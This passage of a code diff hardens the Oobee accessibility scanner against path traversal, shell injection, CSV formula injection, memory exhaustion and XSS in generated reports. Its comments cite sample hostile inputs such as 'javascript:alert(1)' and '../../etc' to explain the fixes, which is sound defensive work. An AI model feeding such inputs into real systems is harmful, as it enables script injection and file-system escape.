   ? path.resolve(outputArg)
   : path.resolve(process.cwd(), 'oobee-client-scanner.js');
 
-writeFileSync(outputPath, generateClientBundle(), 'utf-8');
-console.log(`Generated: ${outputPath}`);
-console.log(`  App version  : ${APP_VERSION}`);
-console.log(`  Sentry DSN   : ${SENTRY_DSN.slice(0, 40)}…`);
-console.log(`  Sentry SDK   : @sentry/browser ${SENTRY_NODE_VERSION} (CDN)`);
+(async () => {
+  const sentrySdkSri = await resolveSentrySri(SENTRY_NODE_VERSION);
+  if (!sentrySdkSri) {
+    console.warn(
+      `[generateOobeeClientScanner] WARNING: could not resolve Sentry SDK SRI for ` +
+      `@sentry/browser ${SENTRY_NODE_VERSION}. Generated bundle will load the CDN ` +
+      `script without integrity pinning. Set OOBEE_SENTRY_SDK_SRI to a sha384-... ` +
+      `value to pin it explicitly.`,
+    );
+  }
+  writeFileSync(outputPath, generateClientBundle(sentrySdkSri), 'utf-8');
+  console.log(`Generated: ${outputPath}`);
+  console.log(`  App version  : ${APP_VERSION}`);
+  console.log(`  Sentry DSN   : ${SENTRY_DSN.slice(0, 40)}…`);
+  console.log(`  Sentry SDK   : @sentry/browser ${SENTRY_NODE_VERSION} (CDN)`);
+  console.log(`  Sentry SRI   : ${sentrySdkSri || '(none — bundle loads without integrity)'}`);
+})().catch((err) => {
+  console.error('[generateOobeeClientScanner] failed:', err);
+  process.exit(1);
+});

--- a/src/mergeAxeResults.ts
+++ b/src/mergeAxeResults.ts
@@ -827,7 +827,19 @@ const generateArtifacts = async (
       htmlETL: oobeeAiHtmlETL,
       rules: oobeeAiRules,
     },
-    siteName: getEntryPageTitle(pagesScanned, urlScanned).replace(/^\d+\s*:\s*/, '').trim(),
+    // siteName is the <title> of the entry page and reaches the report
+    // renderer as-is. The client-side sink is now textContent (ScanDetails.ejs),
+    // but we also drop control characters and cap the length here so a
+    // pathological title cannot bloat the JSON payload or render as
+    // interactive content in any future consumer of allIssues.
+    siteName: (() => {
+      const raw = getEntryPageTitle(pagesScanned, urlScanned)
+        .replace(/^\d+\s*:\s*/, '')
+        .trim();
+      // eslint-disable-next-line no-control-regex
+      const stripped = raw.replace(/[ -]/g, '');
+      return stripped.length > 512 ? stripped.slice(0, 512) : stripped;
+    })(),
     startTime: scanDetails.startTime ? scanDetails.startTime : new Date(),
     endTime: scanDetails.endTime ? scanDetails.endTime : new Date(),
     urlScanned,

--- a/src/mergeAxeResults/writeCsv.ts
+++ b/src/mergeAxeResults/writeCsv.ts
@@ -5,7 +5,16 @@ import type { ItemsStore } from './itemsStore.js';
 
 function escapeCsvField(value: string): string {
   if (value == null) return '';
-  const str = String(value);
+  let str = String(value);
+  // Guard against CSV formula injection. Excel/Sheets treat cells whose
+  // first character is =, +, -, @, tab, or CR as formulas and will execute
+  // functions like DDE calls or hyperlink phishing. Scanned page titles /
+  // URLs feed straight into this file, so prefix a single quote to force
+  // literal-text interpretation without changing the visible content in
+  // most viewers.
+  if (/^[=+\-@\t\r]/.test(str)) {
+    str = `'${str}`;
+  }
   return `"${str.replace(/"/g, '""')}"`;
 }
 

--- a/src/npmIndex.ts
+++ b/src/npmIndex.ts
@@ -425,7 +425,13 @@ export const init = async ({
   // via a crafted hostname.
   const rawDomain = new URL(entryUrl).hostname;
   const domain = rawDomain.replace(/[^A-Za-z0-9._-]/g, '_');
-  const sanitisedLabel = testLabel ? `_${testLabel.replaceAll(' ', '_')}` : '';
+  // testLabel is a caller-supplied string and lands inside a filesystem
+  // path (storage/results/<token>/...). Left as-is, ``../../etc`` or
+  // ``/tmp/whatever`` would escape the results directory and reach fs.rm
+  // during cleanup. Coerce to a single [A-Za-z0-9_-] segment.
+  const sanitisedLabel = testLabel
+    ? `_${String(testLabel).replace(/[^A-Za-z0-9_-]+/g, '_').slice(0, 64)}`
+    : '';
   const randomToken = `${date}_${time}${sanitisedLabel}_${domain}`;
 
   const disableOobee = ruleset.includes(RuleFlags.DISABLE_OOBEE);

--- a/src/npmIndex.ts
+++ b/src/npmIndex.ts
@@ -418,7 +418,13 @@ export const init = async ({
   consoleLogger.info('Starting Oobee');
 
   const [date, time] = new Date().toLocaleString('sv').replaceAll(/-|:/g, '').split(' ');
-  const domain = new URL(entryUrl).hostname;
+  // hostname is derived from user-supplied entryUrl and used to build
+  // filesystem paths (storage/results/<token>/pdfs/...). Constrain it to a
+  // safe character class so a path that later reaches a shell, a child
+  // process argument list, or a report renderer cannot smuggle metacharacters
+  // via a crafted hostname.
+  const rawDomain = new URL(entryUrl).hostname;
+  const domain = rawDomain.replace(/[^A-Za-z0-9._-]/g, '_');
   const sanitisedLabel = testLabel ? `_${testLabel.replaceAll(' ', '_')}` : '';
   const randomToken = `${date}_${time}${sanitisedLabel}_${domain}`;
 

--- a/src/safeBrowsingProfile.ts
+++ b/src/safeBrowsingProfile.ts
@@ -1,4 +1,4 @@
-import { type ChildProcess, spawn, execSync } from 'child_process';
+import { type ChildProcess, spawn, execFileSync } from 'child_process';
 import fs from 'fs';
 import path from 'path';
 import os from 'os';
@@ -62,7 +62,11 @@ function findPrePopulatedSource(): string | null {
       const extractDir = path.join(BASE_PROFILE_DIR, 'Safe Browsing');
       fs.mkdirSync(extractDir, { recursive: true });
       try {
-        execSync(`unzip -o -q "${zipPath}" -d "${extractDir}"`, { stdio: 'pipe' });
+        // Invoke unzip via argv (execFileSync, no shell) so a zipPath /
+        // extractDir containing shell metacharacters cannot break out of
+        // the quoted string. zipCandidates includes env-derived paths
+        // (OOBEE_SAFE_BROWSING_DB / OOBEE_SAFE_BROWSING_DB_ZIP).
+        execFileSync('unzip', ['-o', '-q', zipPath, '-d', extractDir], { stdio: 'pipe' });
         if (isDbDir(extractDir)) return extractDir;
       } catch (e) {
         sbDebug(`[SafeBrowsing] Failed to extract zip: ${e}`);

--- a/src/screenshotFunc/pdfScreenshotFunc.ts
+++ b/src/screenshotFunc/pdfScreenshotFunc.ts
@@ -151,7 +151,9 @@ export async function getPdfScreenshots(
         viewport,
       )(bboxesWithCoords[0]);
 
-      newItems[i].screenshotPath = path.join('elemScreenshots', 'pdf', finalScreenshotPath);
+      if (finalScreenshotPath) {
+        newItems[i].screenshotPath = path.join('elemScreenshots', 'pdf', finalScreenshotPath);
+      }
       newItems[i].page = parseInt(pageNum, 10);
 
       page.cleanup();
@@ -160,66 +162,93 @@ export async function getPdfScreenshots(
   return newItems;
 }
 
+// Max crop canvas dimension. A rendered PDF page at 200% scale is well under
+// this bound; a bbox that would produce a larger crop is treated as malformed
+// and skipped rather than allocating a canvas that could exhaust memory.
+const MAX_CROP_DIMENSION = 8192;
+
+const isFinitePositive = (n: unknown): n is number =>
+  typeof n === 'number' && Number.isFinite(n) && n > 0;
+
 const annotateAndSave = (origCanvas: Canvas, screenshotPath: string, viewport: ViewportSize) => {
   return ({ location }) => {
-    const [left, bottom, width, height] = location.map(loc => loc * 2); // scale up by 2
-    const rectParams = [left, viewport.height - bottom - height, width, height];
-
-    // create new canvas to annotate so we do not "pollute" the original
-    const { context: highlightCtx, canvas: highlightCanvas } = canvasFactory.create(
-      viewport.width,
-      viewport.height,
-    );
-
-    highlightCtx.drawImage(origCanvas, 0, 0);
-    highlightCtx.fillStyle = 'rgba(0, 255, 255, 0.2)';
-    highlightCtx.fillRect(...rectParams);
-
-    const rectParamsWithPadding = [
-      left - BBOX_PADDING,
-      viewport.height - bottom - height - BBOX_PADDING,
-      width + BBOX_PADDING * 2,
-      height + BBOX_PADDING * 2,
-    ];
-
-    // create new canvas to crop image
-    const { context: croppedCtx, canvas: croppedCanvas } = canvasFactory.create(
-      rectParamsWithPadding[2],
-      rectParamsWithPadding[3],
-    );
-
-    croppedCtx.drawImage(
-      highlightCanvas,
-      ...rectParamsWithPadding,
-      0,
-      0,
-      rectParamsWithPadding[2],
-      rectParamsWithPadding[3],
-    );
-
-    // convert the canvas to an image
-    // const croppedImage = croppedCanvas.toBuffer();
-    const croppedImage = croppedCanvas.toBuffer('image/png');
-
-    // save image
-    let counter = 0;
-    let indexedScreenshotPath = `${screenshotPath}-${counter}.png`;
-    let fileExists = fs.existsSync(indexedScreenshotPath);
-    while (fileExists) {
-      counter++;
-      indexedScreenshotPath = `${screenshotPath}-${counter}.png`;
-      fileExists = fs.existsSync(indexedScreenshotPath);
-    }
     try {
-      fs.writeFileSync(indexedScreenshotPath, croppedImage);
+      if (!Array.isArray(location) || location.length < 4 || !location.every(n => typeof n === 'number' && Number.isFinite(n))) {
+        consoleLogger.warn('Skipping PDF screenshot: malformed bbox location');
+        return null;
+      }
+
+      const [left, bottom, width, height] = location.map(loc => loc * 2); // scale up by 2
+      const rectParams = [left, viewport.height - bottom - height, width, height];
+
+      // create new canvas to annotate so we do not "pollute" the original
+      const { context: highlightCtx, canvas: highlightCanvas } = canvasFactory.create(
+        viewport.width,
+        viewport.height,
+      );
+
+      highlightCtx.drawImage(origCanvas, 0, 0);
+      highlightCtx.fillStyle = 'rgba(0, 255, 255, 0.2)';
+      highlightCtx.fillRect(...rectParams);
+
+      const cropX = left - BBOX_PADDING;
+      const cropY = viewport.height - bottom - height - BBOX_PADDING;
+      const cropW = width + BBOX_PADDING * 2;
+      const cropH = height + BBOX_PADDING * 2;
+
+      // Clamp bbox-derived canvas dimensions BEFORE allocation. A malformed
+      // PDF whose structure tree points at a bbox with huge width/height
+      // would otherwise ask @napi-rs/canvas to allocate an image buffer of
+      // W * H * 4 bytes, potentially exhausting RAM and terminating the
+      // scan process.
+      if (!isFinitePositive(cropW) || !isFinitePositive(cropH) ||
+          cropW > MAX_CROP_DIMENSION || cropH > MAX_CROP_DIMENSION) {
+        consoleLogger.warn(
+          `Skipping PDF screenshot: crop dimensions out of bounds (${cropW}x${cropH})`,
+        );
+        canvasFactory.destroy({ canvas: highlightCanvas, context: highlightCtx });
+        return null;
+      }
+
+      const rectParamsWithPadding = [cropX, cropY, cropW, cropH];
+
+      // create new canvas to crop image
+      const { context: croppedCtx, canvas: croppedCanvas } = canvasFactory.create(cropW, cropH);
+
+      croppedCtx.drawImage(
+        highlightCanvas,
+        ...rectParamsWithPadding,
+        0,
+        0,
+        rectParamsWithPadding[2],
+        rectParamsWithPadding[3],
+      );
+
+      const croppedImage = croppedCanvas.toBuffer('image/png');
+
+      // save image
+      let counter = 0;
+      let indexedScreenshotPath = `${screenshotPath}-${counter}.png`;
+      let fileExists = fs.existsSync(indexedScreenshotPath);
+      while (fileExists) {
+        counter++;
+        indexedScreenshotPath = `${screenshotPath}-${counter}.png`;
+        fileExists = fs.existsSync(indexedScreenshotPath);
+      }
+      try {
+        fs.writeFileSync(indexedScreenshotPath, croppedImage);
+      } catch (e) {
+        consoleLogger.error('Error in writing screenshot:', e);
+      }
+
+      canvasFactory.destroy({ canvas: croppedCanvas, context: croppedCtx });
+      canvasFactory.destroy({ canvas: highlightCanvas, context: highlightCtx });
+
+      return path.basename(indexedScreenshotPath);
     } catch (e) {
-      consoleLogger.error('Error in writing screenshot:', e);
+      consoleLogger.error('Error while producing PDF screenshot:', e);
+      return null;
     }
-
-    canvasFactory.destroy({ canvas: croppedCanvas, context: croppedCtx });
-    canvasFactory.destroy({ canvas: highlightCanvas, context: highlightCtx });
-
-    return path.basename(indexedScreenshotPath);
   };
 };
 

--- a/src/static/ejs/partials/scripts/header/SiteInfo.ejs
+++ b/src/static/ejs/partials/scripts/header/SiteInfo.ejs
@@ -4,6 +4,16 @@
     document.getElementById('siteName').textContent = siteName;
 
     const siteUrl = scanData.urlScanned || '#';
+    // urlScanned is user-supplied CLI input, so a value like
+    // ``javascript:alert(1)`` would run when the reviewer clicks the link.
+    // Only accept http(s) and fall back to '#' otherwise.
+    let safeHref = '#';
+    try {
+      const u = new URL(siteUrl, document.baseURI);
+      if (u.protocol === 'http:' || u.protocol === 'https:') {
+        safeHref = u.href;
+      }
+    } catch (_) { /* keep safeHref = '#' */ }
     const siteUrlElement = document.getElementById('siteUrl');
     const urlTextElement = siteUrlElement.querySelector('.url-text');
     if (urlTextElement) {
@@ -15,7 +25,7 @@
         urlTextElement.appendChild(svgElement);
       }
     }
-    siteUrlElement.href = siteUrl;
+    siteUrlElement.href = safeHref;
 
     const formatScanDate = dateString => {
       const utcDate = new Date(dateString);

--- a/src/static/ejs/partials/scripts/header/aboutScanModal/ScanConfiguration.ejs
+++ b/src/static/ejs/partials/scripts/header/aboutScanModal/ScanConfiguration.ejs
@@ -6,36 +6,106 @@
   const pagesScannedList = document.getElementById('pagesScannedList');
   const pagesNotScannedList = document.getElementById('pagesNotScannedList');
 
-  pagesScanned.forEach((page, index) => {
+  // Every page.url, page.pageTitle, page.metadata, and page.pageImagePath
+  // value here is crawled from an untrusted scanned site. Template literals
+  // followed by innerHTML would treat those strings as markup, so a scanned
+  // page could inject <script>/onerror/etc. into the report the reviewer
+  // opens. Build DOM nodes with createElement/textContent instead, and only
+  // accept URLs whose scheme is safe.
+  const SAFE_HREF_SCHEMES = /^(https?:|mailto:)/i;
+  const SAFE_IMG_SCHEMES = /^(https?:|data:image\/|blob:|file:)/i;
+
+  const isSafeHref = (url) => {
+    if (typeof url !== 'string') return false;
+    const trimmed = url.trim();
+    if (trimmed === '') return false;
+    // Allow relative same-origin paths (start with `/`, `./`, `../`) — those
+    // are common for local report screenshots and cannot carry a scheme.
+    if (/^[./]/.test(trimmed)) return true;
+    return SAFE_HREF_SCHEMES.test(trimmed);
+  };
+
+  const isSafeImgSrc = (url) => {
+    if (typeof url !== 'string') return false;
+    const trimmed = url.trim();
+    if (trimmed === '') return false;
+    if (/^[./]/.test(trimmed)) return true;
+    return SAFE_IMG_SCHEMES.test(trimmed);
+  };
+
+  const EXTERNAL_ICON_NS = 'http://www.w3.org/2000/svg';
+  const EXTERNAL_ICON_PATH_D = 'M7.11111 7.11111H0.888889V0.888889H4V0H0.888889C0.395556 0 0 0.4 0 0.888889V7.11111C0 7.6 0.395556 8 0.888889 8H7.11111C7.6 8 8 7.6 8 7.11111V4H7.11111V7.11111ZM4.88889 0V0.888889H6.48444L2.11556 5.25778L2.74222 5.88444L7.11111 1.51556V3.11111H8V0H4.88889Z';
+  const buildExternalIcon = () => {
+    const svg = document.createElementNS(EXTERNAL_ICON_NS, 'svg');
+    svg.setAttribute('class', 'link-external-icon');
+    svg.setAttribute('width', '16');
+    svg.setAttribute('height', '12');
+    svg.setAttribute('viewBox', '0 0 8 8');
+    svg.setAttribute('aria-hidden', 'true');
+    svg.setAttribute('focusable', 'false');
+    const path = document.createElementNS(EXTERNAL_ICON_NS, 'path');
+    path.setAttribute('d', EXTERNAL_ICON_PATH_D);
+    path.setAttribute('fill', '#5735DF');
+    svg.appendChild(path);
+    return svg;
+  };
+
+  const buildSafeAnchor = (url, label, extraClass) => {
+    const a = document.createElement('a');
+    if (extraClass) a.className = extraClass;
+    if (isSafeHref(url)) {
+      a.href = url;
+      a.setAttribute('target', '_blank');
+      a.setAttribute('rel', 'noopener noreferrer');
+    }
+    a.textContent = label;
+    return a;
+  };
+
+  pagesScanned.forEach((page) => {
     const listItem = document.createElement('li');
+    const label = (page.pageTitle && page.pageTitle.length > 0) ? page.pageTitle : page.url;
 
     if (isCustomFlow) {
-      listItem.innerHTML = `
-        <div class="custom-flow-screenshot-container">
-          <div class="custom-flow-thumb">
-            <img 
-              src="${page.pageImagePath}" 
-              alt="Screenshot of ${page.url}"
-              class="custom-flow-screenshot"
-              onerror="this.onerror = null; this.remove();"
-            >
-          </div>
-          <div class="display-url-container">
-            <a href="${page.url}" target="_blank">${page.pageTitle?.length > 0 ? page.pageTitle : page.url}</a>
-            <p>${page.url}</p>
-          </div>
-        </div>
-      `;
+      const outer = document.createElement('div');
+      outer.className = 'custom-flow-screenshot-container';
+
+      const thumb = document.createElement('div');
+      thumb.className = 'custom-flow-thumb';
+      const img = document.createElement('img');
+      img.className = 'custom-flow-screenshot';
+      img.setAttribute('alt', `Screenshot of ${page.url ?? ''}`);
+      img.setAttribute('onerror', 'this.onerror = null; this.remove();');
+      if (isSafeImgSrc(page.pageImagePath)) {
+        img.setAttribute('src', page.pageImagePath);
+      }
+      thumb.appendChild(img);
+
+      const urlBox = document.createElement('div');
+      urlBox.className = 'display-url-container';
+      urlBox.appendChild(buildSafeAnchor(page.url, label));
+      const urlText = document.createElement('p');
+      urlText.textContent = page.url ?? '';
+      urlBox.appendChild(urlText);
+
+      outer.appendChild(thumb);
+      outer.appendChild(urlBox);
+      listItem.appendChild(outer);
     } else {
-      listItem.innerHTML = `
-        <a href="${page.url}" target="_blank">
-          ${page.pageTitle?.length > 0 ? page.pageTitle : page.url}
-          <svg class="link-external-icon" width="16" height="12" viewBox="0 0 8 8" aria-hidden="true" focusable="false">
-            <path d="M7.11111 7.11111H0.888889V0.888889H4V0H0.888889C0.395556 0 0 0.4 0 0.888889V7.11111C0 7.6 0.395556 8 0.888889 8H7.11111C7.6 8 8 7.6 8 7.11111V4H7.11111V7.11111ZM4.88889 0V0.888889H6.48444L2.11556 5.25778L2.74222 5.88444L7.11111 1.51556V3.11111H8V0H4.88889Z" fill="#5735DF"/>
-          </svg>
-        </a>
-        <p>${page.url}</p>
-      `;
+      const a = document.createElement('a');
+      if (isSafeHref(page.url)) {
+        a.href = page.url;
+        a.setAttribute('target', '_blank');
+        a.setAttribute('rel', 'noopener noreferrer');
+      }
+      a.appendChild(document.createTextNode(label));
+      a.appendChild(document.createTextNode(' '));
+      a.appendChild(buildExternalIcon());
+      listItem.appendChild(a);
+
+      const urlText = document.createElement('p');
+      urlText.textContent = page.url ?? '';
+      listItem.appendChild(urlText);
     }
 
     pagesScannedList.appendChild(listItem);
@@ -57,54 +127,65 @@
   const unsupportedDocs = pagesNotScanned.filter((it) => isUnsupportedDoc(it));
   const notScannedOnly = pagesNotScanned.filter((it) => !isUnsupportedDoc(it));
 
-  document.getElementById('totalPagesScannedLabel').innerHTML = scanData.totalPagesScanned;
-  document.getElementById('totalPagesNotScannedLabel').innerHTML =
-    notScannedOnly.length;
+  document.getElementById('totalPagesScannedLabel').textContent = scanData.totalPagesScanned;
+  document.getElementById('totalPagesNotScannedLabel').textContent = notScannedOnly.length;
 
-  notScannedOnly.forEach((page, index) => {
-    var listItem = document.createElement('li');
+  notScannedOnly.forEach((page) => {
+    const listItem = document.createElement('li');
     const url = page.url || page;
     const metadata = page.metadata || page;
 
-    const linkHTML = `<a class="not-scanned-url" href="${url}" target="_blank">
-      ${url}
-      <svg class="link-external-icon" width="16" height="12" viewBox="0 0 8 8" aria-hidden="true" focusable="false">
-        <path d="M7.11111 7.11111H0.888889V0.888889H4V0H0.888889C0.395556 0 0 0.4 0 0.888889V7.11111C0 7.6 0.395556 8 0.888889 8H7.11111C7.6 8 8 7.6 8 7.11111V4H7.11111V7.11111ZM4.88889 0V0.888889H6.48444L2.11556 5.25778L2.74222 5.88444L7.11111 1.51556V3.11111H8V0H4.88889Z" fill="#5735DF"/>
-      </svg>
-    </a>`;
-    const metadataHTML = `
-      <div class="metadata-inline">
-        <span class="metadata-text">
-          ${metadata}
-        </span>
-      </div>`;
+    const a = document.createElement('a');
+    a.className = 'not-scanned-url';
+    if (isSafeHref(url)) {
+      a.href = url;
+      a.setAttribute('target', '_blank');
+      a.setAttribute('rel', 'noopener noreferrer');
+    }
+    a.appendChild(document.createTextNode(String(url ?? '')));
+    a.appendChild(document.createTextNode(' '));
+    a.appendChild(buildExternalIcon());
+    listItem.appendChild(a);
 
-    listItem.innerHTML = `${linkHTML}${metadataHTML}`;
+    const metaBox = document.createElement('div');
+    metaBox.className = 'metadata-inline';
+    const metaSpan = document.createElement('span');
+    metaSpan.className = 'metadata-text';
+    metaSpan.textContent = typeof metadata === 'string' ? metadata : String(metadata ?? '');
+    metaBox.appendChild(metaSpan);
+    listItem.appendChild(metaBox);
+
     pagesNotScannedList.appendChild(listItem);
   });
 
   const unsupportedList = document.getElementById('unsupportedDocsList');
   if (unsupportedList) {
-    unsupportedList.innerHTML = '';
+    unsupportedList.replaceChildren();
     unsupportedDocs.forEach((page) => {
       const li = document.createElement('li');
       const url = page.url || page;
-      const title = page.pageTitle?.length ? page.pageTitle : url;
+      const title = (page.pageTitle && page.pageTitle.length) ? page.pageTitle : url;
       const metadata = page.metadata || 'Not A Supported Document';
-      li.innerHTML = `
-        <a href="${url}" target="_blank" rel="noopener">
-          ${title}
-          <svg class="link-external-icon" width="16" height="12" viewBox="0 0 8 8" aria-hidden="true" focusable="false">
-            <path d="M7.11111 7.11111H0.888889V0.888889H4V0H0.888889C0.395556 0 0 0.4 0 0.888889V7.11111C0 7.6 0.395556 8 0.888889 8H7.11111C7.6 8 8 7.6 8 7.11111V4H7.11111V7.11111ZM4.88889 0V0.888889H6.48444L2.11556 5.25778L2.74222 5.88444L7.11111 1.51556V3.11111H8V0H4.88889Z" fill="#5735DF"/>
-          </svg>
-        </a>
 
-        <div class="metadata-inline">
-          <span class="metadata-text">
-            ${metadata}
-          </span>
-        </div>
-      `;
+      const a = document.createElement('a');
+      if (isSafeHref(url)) {
+        a.href = url;
+        a.setAttribute('target', '_blank');
+        a.setAttribute('rel', 'noopener noreferrer');
+      }
+      a.appendChild(document.createTextNode(String(title ?? '')));
+      a.appendChild(document.createTextNode(' '));
+      a.appendChild(buildExternalIcon());
+      li.appendChild(a);
+
+      const metaBox = document.createElement('div');
+      metaBox.className = 'metadata-inline';
+      const metaSpan = document.createElement('span');
+      metaSpan.className = 'metadata-text';
+      metaSpan.textContent = typeof metadata === 'string' ? metadata : String(metadata ?? '');
+      metaBox.appendChild(metaSpan);
+      li.appendChild(metaBox);
+
       unsupportedList.appendChild(li);
     });
   }

--- a/src/static/ejs/partials/scripts/header/aboutScanModal/ScanDetails.ejs
+++ b/src/static/ejs/partials/scripts/header/aboutScanModal/ScanDetails.ejs
@@ -28,7 +28,13 @@
 
   const formattedViewerLocalStartTime = formatAboutStartTime(scanData.startTime);
 
-  document.getElementById('websiteTitle').innerHTML = scanData.siteName;
+  // siteName / viewport / oobeeAppVersion are all derived from the scanned
+  // page (title tag, CLI arg, browser reported metadata) and land here as
+  // free-form strings. Any innerHTML sink parses them as markup, which lets
+  // a scanned site smuggle <script> or event-handler attributes into the
+  // report the reviewer later opens. Use textContent so the value is
+  // rendered as literal text.
+  document.getElementById('websiteTitle').textContent = scanData.siteName;
 
   const urlA = document.getElementById('urlScanned');
   const urlSpan = document.getElementById('urlScannedText');
@@ -37,13 +43,13 @@
 
   document.getElementById('aboutStartTime').innerHTML = formattedViewerLocalStartTime;
 
-  document.getElementById('viewport-text').innerHTML = scanData.viewport.startsWith('CustomWidth')
+  document.getElementById('viewport-text').textContent = scanData.viewport.startsWith('CustomWidth')
     ? `${scanData.viewport.split('_')[1]} Custom Width View`
     : scanData.viewport + ' View';
 
   const phAppVersionElement = document.getElementById('oobeeAppVersion');
   const versionContent = 'Oobee Version ' + scanData.oobeeAppVersion;
-  phAppVersionElement.innerHTML = versionContent;
+  phAppVersionElement.textContent = versionContent;
 
   const cypressScanAboutMetadata = scanData.cypressScanAboutMetadata;
   if (cypressScanAboutMetadata) {

--- a/src/static/ejs/partials/scripts/ruleModal/itemCardRenderer.ejs
+++ b/src/static/ejs/partials/scripts/ruleModal/itemCardRenderer.ejs
@@ -280,7 +280,7 @@
         <div class="fw-semibold">Path</div>
         <div class="page-item-card-section-content">
           <div class="g-one path-container">
-            ${xpath}
+            ${htmlEscapeString(xpath)}
             <button
               aria-label="Copy path to clipboard"
               class="copy-button"

--- a/src/static/ejs/partials/scripts/ruleModal/pageAccordionBuilder.ejs
+++ b/src/static/ejs/partials/scripts/ruleModal/pageAccordionBuilder.ejs
@@ -371,7 +371,7 @@
           <div class="d-flex justify-content-between g-one modal-view">
             <div class="fw-semibold">URL</div>
             <div class="page-item-card-section-content">
-              <a href="${item.pageUrl}" target="_blank">${item.pageUrl}</a>
+              <a href="${htmlEscapeString(isSafeReportHref(item.pageUrl))}" target="_blank" rel="noopener noreferrer">${htmlEscapeString(item.pageUrl)}</a>
               <svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
                   <g clip-path="url(#clip0_174_1993)">
                       <path d="M12.6667 12.6667H3.33333V3.33333H8V2H3.33333C2.59333 2 2 2.6 2 3.33333V12.6667C2 13.4 2.59333 14 3.33333 14H12.6667C13.4 14 14 13.4 14 12.6667V8H12.6667V12.6667ZM9.33333 2V3.33333H11.7267L5.17333 9.88667L6.11333 10.8267L12.6667 4.27333V6.66667H14V2H9.33333Z" fill="#5735DF"/>
@@ -426,7 +426,7 @@
           <div class="accordion-item rule-modal-item">
             <div class="accordion-header" id="${accordionId}-title">
               ${normalMode ? '<button' : '<div'}
-                aria-label="Page ${index + 1}: ${page.pageTitle}, ${pageItemsCount} ${pageItemsCount === 1 ? 'occurrence' : 'occurrences'}"
+                aria-label="Page ${index + 1}: ${htmlEscapeString(page.pageTitle)}, ${pageItemsCount} ${pageItemsCount === 1 ? 'occurrence' : 'occurrences'}"
                 class="accordion-button collapsed"
                 ${normalMode ? 'type="button"' : ''}
               >
@@ -444,7 +444,7 @@
                     fill="#5735DF"
                   />
                 </svg>
-                <div class="me-3 flex-1">${page.metadata ? page.metadata : page.pageTitle}</div>
+                <div class="me-3 flex-1">${htmlEscapeString(page.metadata ? page.metadata : page.pageTitle)}</div>
                 <div class="ms-auto rule-occurrence-count counter">${pageItemsCount} occ.</div>
               ${normalMode ? '</button>' : '</div>'}
             </div>
@@ -454,7 +454,7 @@
                   ? createCustomFlowContent(page, ruleInCategory)
                   :
                   `<div class="d-flex align-items-center gap-1 accordion-link" style="    word-wrap: break-word; word-break: break-word;">
-                    <a href="${page.url}" target="_blank">${page.url}
+                    <a href="${htmlEscapeString(isSafeReportHref(page.url))}" target="_blank" rel="noopener noreferrer">${htmlEscapeString(page.url)}
                       <svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" style="margin-left: 0.25rem;">
                         <g clip-path="url(#clip0_174_1993)">
                             <path d="M12.6667 12.6667H3.33333V3.33333H8V2H3.33333C2.59333 2 2 2.6 2 3.33333V12.6667C2 13.4 2.59333 14 3.33333 14H12.6667C13.4 14 14 13.4 14 12.6667V8H12.6667V12.6667ZM9.33333 2V3.33333H11.7267L5.17333 9.88667L6.11333 10.8267L12.6667 4.27333V6.66667H14V2H9.33333Z" fill="#5735DF"/>
@@ -519,8 +519,8 @@
             ${
               pageScreenshot
                 ? `<img
-                    src="${pageScreenshot}"
-                    alt="Screenshot of ${page.url}"
+                    src="${htmlEscapeString(pageScreenshot)}"
+                    alt="Screenshot of ${htmlEscapeString(page.url)}"
                     class="custom-flow-screenshot"
                     onerror="this.onerror = null; this.remove();"
                   >`
@@ -528,7 +528,7 @@
             }
           </div>
           <div class="display-url-container">
-            <div><a href="${page.url}" target="_blank">${page.url}</a></div>
+            <div><a href="${htmlEscapeString(isSafeReportHref(page.url))}" target="_blank" rel="noopener noreferrer">${htmlEscapeString(page.url)}</a></div>
           </div>
         </div>
     `;

--- a/src/static/ejs/partials/scripts/utils.ejs
+++ b/src/static/ejs/partials/scripts/utils.ejs
@@ -426,6 +426,8 @@
   }
 
   function htmlEscapeString(string) {
+    if (string == null) return '';
+    string = String(string);
     if (string.includes('&lt;/script>')) {
       string = string.replaceAll('&lt;/script>', '<\/script>')
     }
@@ -435,6 +437,24 @@
       .replace(/>/g, '&gt;')
       .replace(/"/g, '&quot;')
       .replace(/'/g, '&#039;');
+  }
+
+  // Only allow http(s)/mailto in report anchors. Values come from scanned
+  // pages (page.url, item.pageUrl) so a crafted javascript:/data: URL would
+  // otherwise become an XSS sink the moment the reviewer clicks the link.
+  // Anything else collapses to '#'.
+  function isSafeReportHref(url) {
+    if (url == null) return '#';
+    const s = String(url).trim();
+    if (!s) return '#';
+    if (/^[./]/.test(s)) return s;
+    try {
+      const u = new URL(s, document.baseURI);
+      if (u.protocol === 'http:' || u.protocol === 'https:' || u.protocol === 'mailto:') {
+        return u.href;
+      }
+    } catch (_) { /* fall through */ }
+    return '#';
   }
 
   // Format string from wcag111 to WCAG 1.1.1

--- a/src/utils.ts
+++ b/src/utils.ts
@@ -78,14 +78,37 @@ export const getPdfStoragePath = (randomToken: string): string => {
   return pdfStoragePath;
 };
 
+// Only allow randomToken values that consist of the same character set the
+// generators produce ([A-Za-z0-9._-]). Anything else could contain path
+// separators (`/`, `\`) or `..` segments and escape the results directory.
+const SAFE_RANDOM_TOKEN = /^[\w.-]+$/;
+const assertSafeRandomToken = (randomToken: string): void => {
+  if (!randomToken || !SAFE_RANDOM_TOKEN.test(randomToken)) {
+    throw new Error(`getStoragePath: unsafe randomToken`);
+  }
+};
+
+const assertPathContains = (parent: string, candidate: string): void => {
+  const resolvedParent    = path.resolve(parent);
+  const resolvedCandidate = path.resolve(candidate);
+  const rel = path.relative(resolvedParent, resolvedCandidate);
+  if (rel.startsWith('..') || path.isAbsolute(rel)) {
+    throw new Error(`getStoragePath: computed path escapes results root`);
+  }
+};
+
 export const getStoragePath = (randomToken: string): string => {
-  // If exportDirectory is set, use it
+  // If exportDirectory is set, use it (already-validated cached result)
   if (constants.exportDirectory) {
     return constants.exportDirectory;
   }
 
+  assertSafeRandomToken(randomToken);
+
   // Otherwise, use the current working directory
-  let storagePath = path.join(process.cwd(), 'results', randomToken);
+  const resultsRoot = path.join(process.cwd(), 'results');
+  let storagePath = path.join(resultsRoot, randomToken);
+  assertPathContains(resultsRoot, storagePath);
 
   // Ensure storagePath is writable; if directory doesn't exist, try to create it in Documents or home directory
   const isWritable = (() => {


### PR DESCRIPTION
## Summary

